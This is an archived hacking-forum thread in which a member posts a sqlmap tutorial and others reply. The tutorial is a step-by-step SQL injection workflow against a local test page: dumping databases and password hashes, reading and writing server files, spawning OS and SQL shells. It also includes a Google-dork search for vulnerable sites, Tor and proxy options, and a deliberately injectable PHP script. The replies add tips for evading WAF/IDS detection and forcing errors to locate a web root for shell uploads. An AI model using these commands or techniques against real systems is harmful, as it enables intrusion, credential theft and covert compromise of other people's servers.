EvilZone

Hacking and Security => Tutorials => : relax April 05, 2013, 09:52:13 PM

: [tut] Sqlmap
: relax April 05, 2013, 09:52:13 PM

Now when Evilzine first issue (http://evilzone.org/news-and-announcements/evilzine-issue-1-2013-04-05/) is released I thought I could post my sqlmap tut here to get comments on it

SQLMAP; by relax

Rank on sectools.org:	30
Work on:	Windows, Mac and Linux
Programmed in:	Python
Price:	free
Homepage:	http://sqlmap.org/
Github:	https://github.com/sqlmapproject/sqlmap
Wiki:	https://github.com/sqlmapproject/sqlmap/wiki

Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program and nether do I “relax”.
Now with that said, let's start shall we? :D

Sqlmap is one of the best automated sql-injection tools out there, if not THE best.
It's an open source, python project that can do in seconds what takes a human minutes or hours if it's even possible to do.

Sqlmap has support for

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,
SQLite, Firebird, Sybase and SAP MaxDB database management systems.
boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.

I personally don't know Sqlmap that well except for some of the standard features and basic usage, but I
will try to give my view of it.
There are also different ways of using this tool depending on how well you know it,
how much noise you want to make, and how big the database is.

A good thing to remember is that all logs and database entries are saved in your output folder within your
Sqlmap folder.

Now lets boot up Sqlmap and look at the basics.

first of we need to know what databases there are for us to explore

./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" –dbs –dbms=mysql

tip:

  --threads=1
  If you want to send more requests at the same time this is faster but it needs a good connection.

  --technique=BEUSTQ 
  If you don't want to test all techniques because of noise or other reason.


  If nothing is found you can try to increase:
  --level=(1-5)
  --risk=(0-3)

The output tells us that that the site is vulnerable to:
boolean-based blind, error-based and union query and/or time-based blind sql-injection.

available databases [4]:
    information_schema
    mysql
    performance_schema
    vurln

vurln is the one we will explore to get some passwords from the awesome site 127.0.0.1 ^.^

./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln –tablesOutput:

Database: vurln
[1 table]
+-------+
| users |
+-------+

./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users –col

Output:

Database: vurln
Table: users
[3 columns]
+----------+-------------+
| Column Type |
+----------+-------------+
| ID | tinyint(4) |
| password | varchar(32) |
| username | varchar(20) |
+----------+-------------+

./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users –dumpThis will tell us it found possible hashes and will ask if we want to crack them with dictionary attack and
password suffixes, this is a good feature but unfortunately pretty slow, using oclHashcat (gpu cracking)
would go much faster with a lot of entries and word list.

However this awesome site (127.0.0.1) is small so we will go for it.
Output:

Database: vurln
Table: users
[126 entries]
+-----+-----------+--------------------------------------------------+
| ID | username | password |
+-----+-----------+--------------------------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 (admin) |
| 2 | relax | 098f6bcd4621d373cade4e832627b4f6 (test) |
| 3 | Tadou | 253614bbac999b38b5b60cae531c4969 (2012) |
| 4 | Gevoo | 98b1e16f65a1500023372d2b362c0991 |
| 5 | Beguu | cff34ad343b069ea6920464ad17d4bcf |
[...]

Lets look at some other scenarios.

if this site would use post request instead of get we would specify that:

./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" --dbs
if you want to search for something specific like columns with the name password:

./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --search -C password
File features like:
read:

./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" \ --file-read="/var/www/vurln.php"
Will save the remote file vurln.php locally in your output folder for the domain. And you will need to know
the full path to the file. Look at full path disclosure vulnerability for more info about this.

Write:

./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" \ --file-write "i_was_never_here.txt" --file-dest "/var/www"
Some shell features that are awesome to know:
OS shell:

./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" –os-shellSql Shell:

./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --sql-shellcheck my old tutorial about uploading sql shell (https://evilzone.org/tutorials/upload-shell-with-sql-injection/) for more information about how to use it
Remember if you can't read/write files with the file features you should try the shell features.

Basic usage of Sqlmap is not harder then that, but just in case you haven't had enough yet, here's some
extra features:

If your not afraid of noise:

./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" --exclude-sysdbs –dump-allwill give you everything except system databases in this case “information_schema” and “mysql” database

for the curious user you have:

./sqlmap.py -g “inurl:index.php?id=”Google dork - this will find vulnerable site from Google for you, but as stated above this is illegal if you do
not have permission from the site owner and are following all laws.

For the one who wants to be anonymous or extra careful:

--proxy=PROXY
--tor=ADDRESS
--tor-port=PORT
--check-waf
--crawl=DEPTH

The vurln.php file for the one who WILL test this legally >.>

: (PHP)

<?php 
if (isset($_POST['user'])) { 
	$con =  mysql_connect("localhost", "root", "password") or die(mysql_error()); 
		mysql_select_db("vurln",$con) or die(mysql_error()); 
	$results = mysql_query("SELECT * FROM users WHERE username='".$_POST['user']."'") or die(mysql_error()); 
	if (mysql_num_rows($results) === 0) echo "Theres no user with that ID"; else { 
		while($row = mysql_fetch_array($results)){ 
			echo "The user $row[username] has the ID $row[ID] <hr>";  
	    	} 
	} 
} 
?>

So what can we say about Sqlmap?
It is a very powerful tool, but like all automatic scanners, it won't find everything, you will have to get your
hands dirty in a lot cases. And it generates a lot of noise if you don't want to get spotted. But it is an
excellent tool that will do work for you that in other cases would take you a lot longer or would be
impossible.

/Relax

: Re: [tut] Sqlmap
: vezzy April 06, 2013, 01:57:20 AM

Not bad. I like your use of practical scenarios. Adds a little touch over the official documentation.

Also, holy shit, Evilzine is out. hhfhgfgdfdhgf

: Re: [tut] Sqlmap
: Evilone May 09, 2013, 07:22:06 PM

Please also use --random-agent as it will mask the default user agent which shows up in the apache logs as "SQLmap"; if you don't do this it's pretty trivial to get flagged by WAF/IDS/IPS and it's easy for a sysadmin to see how the attack went down.

: Re: [tut] Sqlmap
: relax May 09, 2013, 08:03:41 PM

yeah its a good point, there are even commands to check for waf :P

: Re: [tut] Sqlmap
: mrflex June 15, 2013, 04:50:41 AM

Thank you very much I have been looking for a good SQLMAP tutorial :)

: Re: [tut] Sqlmap
: Sunshie August 21, 2013, 03:44:31 AM

http://www.ersec.org/

: Re: [tut] Sqlmap
: AnarchyAngel August 21, 2013, 03:43:26 PM

would be nice to see what you do to find web root for uploading shells if there is no path disclosure with sql error output. I usually try looking in http server config files but they can be a bitch to find.

: Re: [tut] Sqlmap
: Stackprotector August 27, 2013, 04:18:41 PM

: AnarchyAngel August 21, 2013, 03:43:26 PM

would be nice to see what you do to find web root for uploading shells if there is no path disclosure with sql error output. I usually try looking in http server config files but they can be a bitch to find.

Try to get another error :). A nice tactic is to supply a array instead of one value in the GET parameters. For example: google.com/?q=lol to get an error on loads of sites: google.com/?q[]=lol